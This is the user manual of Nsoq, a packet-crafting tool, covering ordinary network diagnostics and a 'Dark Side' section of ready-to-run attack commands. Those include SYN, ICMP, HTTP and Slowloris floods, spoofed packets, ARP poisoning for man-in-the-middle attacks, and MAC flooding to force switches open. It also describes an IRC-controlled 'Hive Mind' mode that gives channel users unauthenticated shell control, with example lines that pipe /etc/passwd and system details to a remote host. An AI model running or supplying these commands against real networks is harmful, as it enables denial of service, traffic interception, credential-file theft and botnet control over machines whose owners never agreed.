                                   Nsoq
                     Network Security over a 'Q'rawler
          _________________________________________________________

                  Felipe Ecker (Khun) <khun@hexcodes.org> 
                                2003 ~ 2014



   Nsoq is a Network Security tool for packet manipulation that allows a
   large number of options. Its primary purpose is to analyze and test several
   scenarios of TCP/IP environments, such as TCP/UDP packets and low levels 
   ARP/RARP packets.
   Nsoq can send packets to any target type (like hostnames, IPs and MAC 
   address) like handling many fields/headers like: Source/Destination IP 
   address, Source/Destination MAC address, TCP flags, ICMP types, 
   TCP/UDP/ICMP packet size, payloads ARP/RARP, etc.

   Nsoq is able to operate in the RSOI mode (Remote System over IRC), where 
   the tool can surrender all control of machine resources to some specific 
   IRC channels (also called Hive Mind option).

   Nsoq executes systematically many types of network based attacks, like 
   packet attacks, MAC/IP Spoofing, DoS/DDoS attacks, ARP Poison, MAC Flooding
   and Web Stress Testing.


______________________________________________________________________________


nsoq
   [-cbzDvuRAUCWBSKY]
   [-d destination] [-s source] [-p port] [-P source_port] [-q number_packets]
   [-F delay] [-n number_threads] [-x buffer_size] [-t ttl] [Ie] [IE] [Id] [Iq]
   [Im] [-M mask] [lI] [Tc] [Ts] [Ta] Tf] [Tr] [Tp] [Tx] [Tn] [-lT <-P port>]
   [-lC <-P port>] [-lU <-P port>] [-i interface] [-H destination_mac] 
   [-h source_mac] [-a ip_address] [-f number_packets] [-r ip-ip] 
   [-e ip_address] [lA] [-N irc_server] [-L irc_channel] [-G channel_password]



              <Global> Options:

   -d <destination>    -->  Destination address
   -s <source>         -->  Source address
   -p <port>           -->  Destination port (Remote)
   -P <source port>    -->  Source port (Local)
   -i <interface>      -->  Interface option
   -q <number packets> -->  Number packets to send
   -x <packet size>    -->  Sets the packet size
   -t <ttl>            -->  TTL option
   -c                  -->  Continuous mode (1 second delay)
   -F <delay>          -->  Flood mode (delay in microseconds)
   -b                  -->  Aggressive flood (CAUTION)
   -z                  -->  Ignore replies
   -n <number threads> -->  Threads number
   -D                  -->  Display the packet content (only received packets)
   -v                  -->  Print software version
   --help              -->  Print this screen and exit
   

              <ICMP> Options:

   -Ie                 -->  ICMP Echo Request (Ping) packet
   -IE                 -->  ICMP Echo Reply packet
   -Id                 -->  ICMP Information Request packet
   -It                 -->  ICMP Timestamp Request packet
   -Iq                 -->  ICMP Source Quench packet
   -Im                 -->  ICMP Mask Request packets
   -M <Mask>           -->  ICMP Mask Reply packet (Mask Form: -M 255.255.0.0)
   -lI                 -->  ICMP Listem Mode. Listen for incoming ICMP packets
   

              <TCP> Options:

   -Tc                 -->  TCP simple connection
   -Ts                 -->  TCP SYN packet
   -Ta                 -->  TCP ACK packet
   -Tf                 -->  TCP FIN packet
   -Tr                 -->  TCP RST packet
   -Tp                 -->  TCP PUSH packet
   -Tx                 -->  XMAS (TCP flags FIN-PSH-URG on)
   -Tn                 -->  NULL (All TCP flags off)
   -lT <-P port>       -->  TCP listen mode. Listen for incoming TCP packets
   -lC <-P port>       -->  TCP listen connections. Wait for TCP connections
   

              <UDP> Options:

   -u                  -->  UDP mode (UDP packets)
   -lU <-p Port>       -->  UDP listen mode. Listen for incoming UDP packets
   

              <ARP/RARP> Options:

   -H <mac address>    -->  Destination MAC address (Eg: -H xx:xx:xx:xx:xx:xx)
   -h <mac address>    -->  Source MAC address (Use: -h xx:xx:xx:xx:xx:xx)
   -R                  -->  Sets packet to RARP mode (Default as ARP)
   -A                  -->  Sets ARP/RARP packet to REQUEST (Default REPLY)
   -a <ip address>     -->  Arp'ping (ping ARP mode - bypass ICMP filters)
   -f <number packets> -->  Mac flooding: Massive flood of spoofed ARP packets
   -r <ip_addr-ip_addr>-->  ARP Cannon: Sends ARP packets on a given IP range
   -e <ip address>     -->  Exception IP: Excludes ip address from ARP Cannon
   -lE                 -->  ARP/RARP listen mode. Listen for ARP/RARP packets
   

              <WEB Stress Test (DoS)> Options:

   -U                  -->  UDP stress test
   -C                  -->  TCP connections stress test
   -W                  -->  HTTP (GET) stress test
   -B                  -->  ICMP stress test
   -S                  -->  TCP SYN stress test
   -K                  -->  TCP ACK stress test
   -Y                  -->  SLOWLORIS (GET/KEEPALIVE) based attack
   [INFO] Use the -p <port> to set other than port 80 (default is port 80)
   [INFO] Use the -F <sec> to set a delay for slowloris packet (default 10 sec)

   
              <HIVE MIND - Mass Remote Control>
                RSOI - Remote System over IRC

   -N <irc server>     -->  IRC network to connect (RSOI mode)
   -L <irc channel>    -->  IRC channel. Use: -L channel without # character
   -G <password>       -->  IRC channel's password
   
   
   


              <GLOBAL Options>
   
   -d <destination>
      Destination host (hostname or IP address).
   
   -s <source>
      Source host (hostname or IP address). If -s <host> option is not
      specified, the Nsoq assumes the IP address found by the first interface
      defined on the system: (eth0, eth1, eth2, etc...) ordinarily.
   
   -p <port>
      Destination port (remote port).
   
   -P <source port>
      Source port (local port).

   -i <interface>
      Sets the interface option (eg: -i eth0).

   -q <number packets>
       Number of packets to send.

   -x <packet size>
      Sets the packet size. The package size cannot be larger than 1470 bytes
      or larger than defined system MTU (eg: MTU=1500).
   
   -t <ttl>
      Sets the TTL field.

   -c
      Continuous mode. Sends packets without interruption with regular interval
      of 1 (one) second between the shoots.

   -F <delay>
      Flood option. Sets the time <delay> between the shoots (in microseconds).
      The -F option cannot be used with -c or -b options.

   -b
      Aggressive flood. This option puts Nsoq optimized to send the largest number
      of packets in a short amount of time (CAUTION).
   
   -z
      Don't wait for replies. Ignore packet responses. 

   -n <number threads>
      Number of threads to use on sending option.

   -D
      Display the packet content on receiving options (tcpdump style).
   
   -v 
      Print the version.
   
   --help
      Print the initial help page.
   
   ---------------------------------------------------------------------------
   
   
   
             <ICMP Options>

   -Ie
      Sends an ICMP packet Type 8 (Echo Request). The target will respond with
      an ICMP packet Type 0 (Echo Reply).
   
   -IE
      Sends an ICMP packet Type 0 (Echo Reply). 
   
   -Id
      Sends an ICMP packet Type 15 (Information Request).
   
   -It
      Send ICMP packets Type 13 (Timestamp Request). 
   
   -Iq   
      Send ICMP packets Type 4 (Source Quench). 
   
   -Im
      Send ICMP packets Type 17 (Mask Request). If the target is configured to
      reply a request mask, a MaskReply pscket will be received with the Mask.
   
   -M <Mask>
      Send ICMP packets Type 18 (Mask Reply). The <Mask> argument is the mask
      defined for packet. (Eg: -M 255.255.0.0).
   
   -lI
      ICMP Listen Mode. Listen for incoming ICMP packets.
   
   ---------------------------------------------------------------------------
   
   
   
             <TCP Options>

   -Tc   
      Does a simple TCP connection. The option -p port is required. This 
      option uses connect() routine for synchronization.
   
   -Ts
      Sends a TCP SYN packet (TCP packet with the SYN bit on).
   
   -Ta
      Sends a TCP ACK packet (TCP packet with the ACK bit on).
   
   -Tf
      Sends a TCP FINAL packet (TCP packet with the FIN bit on).
   
   -Tr
      Sends a TCP RESET packet (TCP packet with the RST bit on).
   
   -Tp
      Sends a TCP PUSH packet (TCP packet with the PSH bit on).
   
   -Tx
      Sends a TCP packet XMAS (TCP packet with the FIN-PUSH-URG bits on).

   -Tn
      Sends a NULL TCP packet (TCP packet with the NONE bits on. 
      All tcp flags are off).
   
   -lT <-P port>
      TCP Listen Mode. Listen for incoming TCP packets. This option is
       used with option "-P port". 

   -lC <-P port>
      Listen for TCP connections. This option need is used with option
      "-P port". The listener uses the accept() function for synchronization.

   ---------------------------------------------------------------------------

   

             <UDP Options>
   -u
      UDP mode.

   -lU <-P port>
      UDP Listen mode. Listen for incoming UDP packets. This option is
      used with the option "-P port". The UDP listener doesn't use a stream
      connection.

   ---------------------------------------------------------------------------



              <ARP/RARP Options>

   -H <destination mac>
      Destination MAC address. Option required for ARP packets. 
      This option requires a destination IP address. If "-d <destination>"
      is not given, Nsoq will assume by default a NULL value in this field
      header. Form: -H AA:DD:CC:22:11:AA.

   -h <source mac>
      Source MAC address. This option requires the source IP address. If 
      "-s <source>" is not given, Nsoq assumes by default the first IP
      address defined by the first interface found in the system (eth0, eth1,
      eth2, etc.). Form: -h AA:DD:CC:22:11:AA.
   
   -R
      Defines the packet type to RARP packet. All ARP/RARP packets sent by
      Nsoq on the link layer are ARP by default. If "-R" is defined, then
      Nsoq send RARP packets instead.

   -A
      Defines the frame type to REQUEST packet. The packets sent by
      Nsoq on the link layer are REPLY by default. If "-A" is defined, then
      Nsoq sets the ARP/RARP packets to "REQUEST" type instead. 
   
   -a <ip address>
      Arping Mode. This option sends ARP REQUEST packets to a given IP 
      address.The target receives the packet and an ARP REPLY packet is 
      returned.
      This option is very useful for hosts that filtering ICMP pings.
   
   -f <number packets>
      Mac Flood (CAUTION !!).
      This option sends ARP REPLY packets with SOURCE MAC, DESTINATION MAC, 
      SOURCE IP ADDRESS and DESTINATION IP ADDRESS (randomly generated) on 
      Aggressive Food. If not specified the "-i <interface>" Nsoq takes the
      first valid interface found in the System. Eg usage:
                                # nsoq -f 120000
      This option does a flooding by sending 120000 packets with random IP 
      addresses and random MAC addresses. This attack is also called 
      MAC FLOODING. Note: 
      USE THIS OPTION VERY CAREFULLY. IT CAN OVERFLOW THE ROUTING TABLES OR
      CAUSE UNEXPECTED BEHAVIOR ON SWITCHES AND NEIGHBORING'S HOSTS ON NETWORK.

   -r <ip_address-ip_address>
      ARP Cannon (CAUTION !!).
      This option sets Nsoq to send ARP REPLY packets to all defined IP 
      addresses in the range "IP - IP". These packets will
      have a destination MAC address defined to the physical broadcast address
      (FF:FF:FF:FF:FF:FF) and source MAC address randomly generated. The 
      option range (IP-IP) needs TO BE in the format shown below. Eg:   
                        # nsoq -r 10.1.1.1-10.1.1.240
      The above option does a flooding to destination physical broadcast 
      FF:FF:FF:FF:FF:FF, saying to network enlace that all IP addresses in the
      range "10.1.1.1 to 10.1.1.240" will have source MAC addresses randomly
      generated. This attack is also called MASSIVE ARP POISONING. This action
      probably TAKE DOWN for moments all IP addresses defined in the range
      argument. NOTE: USE THIS OPTION VERY CAREFULLY. 

   -e <ip address>
      This option excludes the "ip address" from option ARP CANNON (-r ip-ip)
      above defined. Eg: 
                  # nsoq -r 10.1.1.1-10.1.1.240 -e 10.1.1.10
      The above option will exclude the IP address "10.1.1.10" from 
      ARP CANNON attacks.

   -lA
      Listen for incoming ARP/RARP packets on link layer.

   ---------------------------------------------------------------------------



             <WEB Stress Test Options>
   -U
      UDP attack. 
      Sends UDP packets on flood mode to HTTP host (default: Port 80).
   
   -C
      TCP connections attack. 
      Do TCP connections to HTTP host (default: Port 80).
   
   -W
      WEB HTTP attack. 
      Makes HTTP requests (GET) to host (default: Port 80).
   
   -B
      ICMP attack. 
      Sends ICMP packets on flood mode to HTTP host.
      (Also called Death Ping).
   
   -S
      TCP SYN attack. 
      Sends TCP SYN packets on flood mode to HTTP host (default: Port 80). 
      Also called SYN Flood attack.
   
   -K
      TCP ACK attack. 
      Sends TCP ACK packets on flood mode to HTTP host (default: Port 80).

   -Y
      SLOWLORIS HTTP attack.
      Makes partials HTTP requests (GET/KEEPALIVE) to host. (default Port 80).
      

   INFO: Use the option -p <port> to set other port than 80.
   
   ---------------------------------------------------------------------------



             <HIVE MIND (Mass Remote Control) Options>
                   RSOI - Remote System over IRC


   -N <IRC server>
      An IRC network to connect. This option is required to put Nsoq on RSOI mode.

   -L <IRC channel>
      IRC Channel. The channel must be defined without "#" character.
      If this option is not given, then Nsoq will enter on '#nsoq' channel by
      default.
   
   -G <password>
      IRC channel's password (if exists). If this option is not given, then
      Nsoq will type the password's channel like "nsoqpass" by default. 
   
   
   
   
   
______________________________________________________________________________

EXAMPLES:

   # nsoq -d hexcodes -Ie
      Sends an ICMP packet (Echo Request) to host "hexcodes".

   # nsoq -lI
      ICMP listen mode. Listen for ICMP packets like PINGs.

   # nsoq -It -d www.nsoq.org -c
      Sends ICMP packets (Timestamp Request) on continuous mode to server 
      "www.nsoq.org".

   # nsoq -s 10.1.100.100 -d www.nsoq.org -u -p 4140
      Sends an empty UDP packet with spoofed source ip "10.1.100.100" to host
      "hexcodes" on port 4140.

   # nsoq -d www.nsoq.org -u -p 9000 -P 22000 -F 900 -q 20
      Sends only 20 UDP packets to server "www.nsoq.org" on port 9000,
      from source port 22000 with flood Delay of 900 microseconds.

   # nsoq -d 201.1.0.13 -Ie -x 512 -t 50 -z
      Sets Nsoq for sending ICMP packets (Echo Request) with size of 512 bytes
      to host "201.1.0.13" with TTL 50. Don't wait by ICMP Echo ReplY.

   # nsoq -lU -P 59
      Listen UDP packets on local port 59 (all addresses and loopback).

   # nsoq -d hexcodes -Ts -p 6000
      Sends a TCP SYN packet to host "hexcodes" on port 6000.

   # nsoq -lC -P 12345 > file.txt
      Listen for TCP connections on local port "12345", and write the received
      data to the file 'file.txt'.

   # nsoq -d hexcodes -p 12345 < /etc/hosts
      Connect to host 'hexcodes' reading the file '/etc/hosts. The file
      content will be send over the TCP connection on port '12345'
      (netcat style).
   
   # nsoq -lT -P 2134 -D
      Listen for TCP packets on local port "2134" and show the packet content.

   # nsoq -d www.nsoq.org -Tr -p 8080 -n 12 -b
      Sends TCP RST packets to server "www.nsoq.org" on port 8080, with 12
      threads and aggressive flood mode (HOT).

   # nsoq -H FF:FF:FF:FF:FF:FF
      Sends an ARP REPLY packet to physical Broadcast FF:FF:FF:FF:FF:FF. (The
      source MAC address and the source IP address will be obtained locally 
      by the active interface. The destination IP address will be NULL).

   # nsoq -i eth2 -h 00:BB:AA:CC:BB:AA -H FF:FF:FF:FF:FF:FF -d 10.1.10.1 -A
      Sends an ARP REQUEST packet by the eth2 interface with source MAC 
      00:BB:AA:CC:BB:AA, to destination physical Broadcast FF:FF:FF:FF:FF:FF,
      asking "Who ??" on the network have the IP address "10.1.10.1". The IP
      "10.1.10.1" (if alive) will respond with an ARP REPLY filled with its
      own MAC/IP address pair.

   # nsoq -s 10.2.2.100 -h 00:CC:AA:CC:BB:AA -H FF:FF:FF:FF:FF:FF
      Sends an ARP REPLY packet to destination physical Broadcast 
      FF:FF:FF:FF:FF:FF saying that the source IP address "10.2.2.100" have
      now the MAC address 00:CC:AA:CC:BB:AA. (Caution: This option changes
      the ARP cache table. Possible ARP poisoning attack).

   # nsoq -a 10.1.50.100
      Sends an Arp'ing packet to Host "10.1.50.100". If the host hardware is
      alive on a network or LAN, by default an ARP REPLY will be returned.
      Otherwise, nothing happens. This option can be used to bypass ICMP
      filters (PING filters).

   # nsoq -f 250000
      Sends 250000 ARP REPLY packets (to physical broadcast) with the
      fields (SOURCE MAC, DESTINATION MAC, SOURCE IP and DESTINATION IP
      ADDRESSESS) randomly generated.

   # nsoq -lA -D
      Listen for ARP/RARP packets. Listen to all incoming
      ARP/RARP packets on link layer and show the packet content.

   # nsoq -N irc.quakenet.org -L Cybers
      Sets the Nsoq to connect on IRC Server "irc.quakenet.org" on the channel
      #Cybers. This option puts Nsoq on the RSOI mode. So, the tool
      will be NO AVAILABLE to be controled by the user. Only the users on IRC
      server "irc.quakenet.org" channel #Cybers can do this.

   # nsoq -d 10.0.0.1 -W -n 40
      Sets the Nsoq to "WEB Stress Mode". This option puts Nsoq to send HTTP
      requests (GET method) on aggressive flooding to host "10.0.0.1" on port
      80 (default) with 40 threads. This stress test attempts to exhaust the
      web service's resources and check the target's limit response.



______________________________________________________________________________

MORE DISCUSSIONS:

                        #############################
                                 [WHITE SIDE]
                        #############################


       Connection or packet sending to any port or destination
      ________________________________________________________________

   Nsoq can connect or send packets to any destination or port. You can use 
   this option to diagnose a port (listening or not) or check if the host is
   responding as expected:

   # nsoq -d 10.0.0.2 -p 1024 -Tc
      Does a simple TCP connection to host 10.0.0.2 on port 1024.

   # nsoq -d 10.0.0.2 -p 20080 -u
      Sends an UDP packet to host 10.0.0.2 on port 20080.

   # nsoq -d 10.0.0.2 -p 80 -Ts -c
      Sends TCP SYN packets to host 10.0.0.2 on port 80. If the port is open,
      then a TCP [ACK] packet will be returned. Otherwise, usually a TCP [RST]
      packet is returned.




   Listen on any port (TCP and UDP) or listen for ICMP/ARP/RARP packets
   ____________________________________________________________________

   Nsoq listen on any port (UDP and TCP) or listen for ICMP/ARP/RARP
   packets. This option is  used to simulate a listen port supposedly given
   by a software, and verify the connection requests or data incoming.
   The Nsoq also does a listen for incoming ICMP data like: pings,
   replies, source quench, etc. 
   The Nsoq can does a listen on the link layer level, capturing ARP/RARP 
   packets (requests and replies).

   # nsoq -lC -P 20
      Sets nsoq to listen connections on local port 20 (TCP).

   # nsoq -lU -P 1030
      Sets nsoq to listen on local port 1030 (UDP). 

   # nsoq -lT -P 16 -s 10.0.0.1
      Sets nsoq to listen on local port 16 (TCP packets) only bound on the
      address "10.0.0.1".

   # nsoq -lI -D
      Sets nsoq to listen ICMP data and show the packet content. All incoming
      ICMP packets will be captured. This option is useful to display incoming
      pings.

   # nsoq -lA
   Sets nsoq to listen data on the link layer. This option will capture
   incoming ARP and RARP packets. This is useful to display ARP/RARP REQUESTS
   or REPLIES packets they cross the local network (enlace layer).



                    Running like a FTP Connection
                   _______________________________

   Nsoq run like a FTP (over TCP Connection). It can listen on a given
   port, so reading/writing data on a send/received connection (like
   Netcat style). The transferred data types are: BINARY or TEXT.
   This mode is also compatible with Netcat modes (listeners and senders). 

                           (Server Side: On hexcodes host)
   # nsoq -lC -P 2200 > hosts.txt
      Listen on local port 2200 and write the received data to file 
      'hosts.txt'.

                           (Client Side: From any host)
   # cat /etc/hosts | nsoq -d hexcodes -Tc -p 2200
      Does a connection to host 'hexcodes' reading the file '/etc/hosts', 
      and transferring to remote host. The remote host 'hexcodes'
      will write the transferred data to the hosts.txt file.


   Another example:

                           (Server Side: On hexcodes host)
   # nsoq -lC -P 900 < files.zip
     Listen on local port 900 (TCP) reading the 
     'files.zip' to transfer on the next accepted connection.

                           (Client Side: From any host)
   # nsoq -d hexcodes -Tc -p 900 > new.zip
     Sets the Nsoq to connect to the host 'hexcodes' on remote port 900, and
     reading the binary incoming data and writing into the 'news.zip' file.



                           Arping - Alternative Ping
                           _________________________

   Nsoq sends ARP REQUEST packets to destinations in order to
   diagnose whether they are alive on the network. By default, the host that
   receives an ARP REQUEST packet must return an ARP REPLY informing your MAC/IP
   pair. This option is very useful for diagnosing whether a host is alive on 
   the local network. If the host doesn't accept ICMP pings, so the arping mode
   can be used to bypass a firewall that is filtering ICMP packets.

   # nsoq -a 10.0.0.100
      Sends an ARP'ING to host "10.0.0.100". If the host is alive on
      local network, then it will respond with an ARP REPLY packet.






                         #############################
                                  [DARK SIDE]
                         #############################


                    DOS/DDoS based attacks (over Web Stress)
                    ________________________________________

   Since 1.7 version, the nsoq/mptcp has enabled tests of network based 
   attacks. These attacks attempt to exhaust the Web Services resources and
   verify the target's limit.
   If many Nsoq clients run these routines at the same time targeted
   to a single server, then this server may fail in their services or become
   unavailable while the attack lasts (Dos/DDoS):

   # nsoq -d www.nsoq.org -W -n 20
      Sets nsoq to "Stress Test". The tool will send many HTTP requests
      (aggressive flood) to server "nsoq.org" on port 80 (default). and with 20
      threads. This option tries cause a great overhead on target system trying
      to exhaust the Web Service resources. More threads can intensify the
      attack. The number of threads above ~20 on -W option (with a large link)
      can execute a complete denial of services (DoS). 




                             Mac/IP Spoofing
                             _______________

   Nsoq sends packets with spoofed Source IP address and spoofed Source MAC
   address. Nsoq can generates ICMP, TCP (syn, ack, rst, fin, push, null bits 
   and xmas bits on), UDP packets and ARP/RARP (Request and replies) with this
   address filled to any value:

   # nsoq -d 10.0.0.10 -p 890 -Ts -s 10.1.10.10
      Sends a TCP packet (bit syn on) to address "10.0.0.10" on port 890 and
      with source IP address defined (spoofed) to "10.1.10.10".

   # nsoq -s 0.0.0.0 -d 10.0.0.10 -p 9000 -u -c 
      Sends UDP packets to address "10.0.0.10" on port 9000 and with source
      IP address defined to NULL "0.0.0.0".

   # nsoq -d 10.0.0.1 -Ie -z -F 1000 -s 10.255.0.255
      Sends ICMP packets (Echo Request - PING) to address "10.0.0.10" with
      Source IP address defined to "10.255.0.255". This shoot doesn't wait by
      the Echo Reply (-z option) and does a flooding with a delay time of 1000
      microseconds (-F option).

   # nsoq -H FF:FF:FF:FF:FF:FF -h 00:00:00:00:00:00
      Sends an ARP REPLY packet to physical BROADCAST (FF:FF:FF:FF:FF:FF)
      saying that its own IP address has now MAC address
      00:00:00:00:00:00. In this option, the sender (you) will stop
      receive or sending packets because will be isolated for a few seconds 
      (out of communication).




                                Massive Flood
                                _____________

   Nsoq sends any options (ICMP, TCP, UDP, and ARP-RARP) with 'Flood Delay' or
   'Aggressive Flood'. The 'Flood Delay' option sets the interval of shoots
   in microseconds, and send packets in a very low range time. The 
   'Aggressive Flood' is harder because it ignores the packet reply and its 
   optimization has focused to sending a large number of packets per second.
   In certain environments, these options can realize a DoS or stop the host's
   communications. Use these options CAREFULLY. Many aggressive floods can 
   cause a complete unavailability of the target. 

   # nsoq -d www.nsoq.org -Ie -b
      Sends ICMP packets type Echo Request (PING) to server "www.nsoq.org"
      on aggressive flood mode.

   # nsoq -d 10.0.0.10 -p 900 -u -b -x 1300
      Sends UDP packets (aggressive flood) to host "10.0.0.10" on port 900 with
      packet size of 1300 bytes.

   # nsoq -d 10.0.0.1 -Iq -F 10
      Sends ICMP packets (Source Quench type) to host "10.0.0.1" and with a 
      flood delay defined to 10 microseconds. 
      This packet type can decrease the receiver's flow.

   # nsoq -d 10.0.0.10 -s 10.0.0.0 -p 80 -Ts -F 1 -z
      Sends TCP SYN packets to host on port 80, with source IP address defined
      to "10.0.0.0" and with a flood delay defined to 1 microsecond. 
      This option doesn't wait for replies. This attack is also named 
      "Spoofed Syn Flood".




                               ARP Poisoning
                               _____________
   
   Nsoq sends packets at the link layer and can change the source/destination
   MAC addresses. Nsoq manipulate the source MAC address and the source IP
   address changing the ARP cache table of neighbors on the network. The
   characterization of this kind of action is known as MITM (Man In The Midle),
   cause you can change the ARP table of your neighbors making them believe
   that gateway is trusted, where the gateway is poisoned.

   # nsoq -H FF:FF:FF:FF:FF:FF -s 10.0.0.1 -h AA:BB:CC:DD:EE:FF 
      Sends an ARP REPLY packet to physical BROADCAST saying that the
      source IP address "10.0.0.1" has now MAC address AA:BB:CC:DD:EE:FF. If
      the address "10.0.0.1" is alive on the network, then it will be
      unavailable for few minutes (out of physical communication).

   # nsoq -H FF:FF:FF:FF:FF:FF -h 00:00:00:00:00:00 -s 10.0.0.1 -i eth0 -c
      Sends successively ARP REPLY packets to physical BROADCAST by the eth0
      interface, and saying that source host "10.0.0.1" has now the MAC
      address 00:00:00:00:00:00. This option puts the host "10.0.0.1" offline
      while the shoots are going.




      MAC Flooding: Buffer overflow on the Switch's ARP Table (CAM TABLE)
      ___________________________________________________________________

   Nsoq brings one specific option: ARP Flood (MAC FLOODING). This option is
   controversial, but is used for multiple purposes. The Nsoq option "-f (num
   packets)" sends (num packets) to physical BROADCAST with Source and
   Destination MAC addresses randomly generated, and with Source and 
   Destination IP addresses randomly generated too. The intent of this type of
   transmission is overloading the temporary ARP cache table of switches. 
   Doing this shooting in a massive mode, you can exhaust the memory buffer 
   storage table of the switch, which it will enter in "Fail Open" mode. 
   On this stage, the switch will send all packets to all ports on the device
   (HUB mode), facilitating a process of sniffer NO-UNICAST of any host on 
   the network.

   # nsoq -f 140000
      Sets nsoq to send 140000 ARP REPLY packets to physical BROADCAST with
      source and destination MAC address, source and destination IP address
      generated randomly. If the switch's memory buffer (CAM Table) is
      less than 140000, then the switch will enter on "Fail Open mode".





                       #############################
                                [HIVE MIND]
                          (Mass Remote Control)
                       #############################

                       RSOI - Remote System over IRC 


   Since 1.7 version, Nsoq has enabled the RSOI (Hive Mind) option for external
   use. This control is totally managed by an IRC channel, where a central
   controller (through commands given on the arbitrary channel of an IRC server)
   can remotely control all the clients (Nsoq) logged on the channel. This 
   option cannot be used outside an IRC network, because Nsoq was developed 
   waiting a communication over an IRC protocol.

   Inside this option, the user no more has control over the tool, giving all
   your control to the IRC #channel. In other words, using RSOI mode you give
   total control of Nsoq and the local MACHINE to all on IRC #channel, who can
   manipulate and use the local resources without any authentication.

   Otherwise, is useful for:

   (*) To Check the limit link of the remote host, where a controller may join 
   many users at a channel, and then with a single shoot to make all the NSOQs 
   clients at same time responding to this command, triggering packets to a 
   specific target and checking the loading limitations.

   (*) FTP mode, using the IRC channel to manage the specific file transfer
   over trusted machines.


   Examples:

   # nsoq -N irc.quakenet.org
      (If no channel is given, default #nsoq channel is used)
      (If no password is given, default 'nsoqpass' channel's password is used)


   This option sets Nsoq to enter on IRC Server "irc.quakenet.com" (#nsoq 
   channel by default). If Nsoq has logged without errors, the client will NOT
   accept any command from the user, cause Nsoq only will respond to commands 
   that arrive from IRC server (#nsoq channel). If many Nsoq clients are logged
   in, all clients will be controlled by anyone that have write access to 
   channels. Therefore, all the clients will execute the commands typed in 
   the channel. 

                 # nsoq -N irc.quakenet.org -L Cybers
              (#Cybers channel defined in Nsoq connection)

                                (or)

            # nsoq -N irc.quakenet.org -L Cybers -G pass
     (Password "pass" defined to #Cybers channel in Nsoq connection)

   

   After connected, the channel can send any commands to ALL Nsoq clients.
   These commands have a specific syntax to differentiate it from normal text
   typed on channel. Nsoq just understands commands prefixed by syntax:

   @!~<space>
   
   Ie, everything that comes after this syntax says to all Nsoq clients to use
   this words like a real execution command:

   @!~ nsoq -d nsoq.org -Ie
       That says to ALL Nsoq clients connected on the channel to send an ICMP
       Echo Request (Ping) to "www.nsoq.org" server. 


   Another example. Sounds like a blind query:

   @!~ cat /etc/hosts
       This command (sent by the #channel) tells to all Nsoq clients to run the
       "cat" command on /etc/passwd file. 
       The result WILL BE NOT SHOWED on IRC channel.


   One more example and SO MUCH MORE DANGEROUS:

   @!~ cat /etc/passwd | nsoq -d nsoq.org -Tc -p 123

      SO MUCH MORE DANGEROUS:
      This command (sent by the #channel) tells to all Nsoq clients run a cat
      command on '/etc/passwd' file and send result to remote host nsoq.org. If
      the nsoq.org is listening on port 123 with Nsoq or Netcat (ie), the
      content of remote '/etc/passwd' file will be transferred. 

   Conclusion:
   So we don't need spawn a shell, cause we already have one dedicated shell
   under RSOI mode across the IRC channel. Such this:

      @!~ ls -al /etc | nsoq -d nsoq.org -Tc -p 123

      @!~ whoami | nsoq -d nsoq.org -Tc -p 123

      @!~ uname -a | nsoq -d nsoq.org -Tc -p 123

      @!~ grep root /etc/passwd | nsoq -d nsoq.org -Tc -p 123



_____________________________________________________________________________

SECURITY:

   Nsoq needs superuser privileges (root) for execution. DO NOT use the bit
   SUID to allow root privileges. This is not recommended and may allow
   involuntary or aggressive DoS/DDoS attacks. The privileged use of Nsoq also
   allows users manipulate the ARP cache table of neighbors on network, or put
   all the system over a remote control.


______________________________________________________________________________

DISPONIBILITY:

   Nsoq is licensed under GPL and Free Software Foundation.
   A copy of the license accompanies the software.
   Licensed under GPL 3 - (C) Copyright).

   The Nsoq can be freely downloaded here: http://www.nsoq.org.

                                  Thank you.


              _____________________________________________________
                    Felipe Ecker (Khun) <khun@hexcodes.org>
                               -www.nsoq.org-

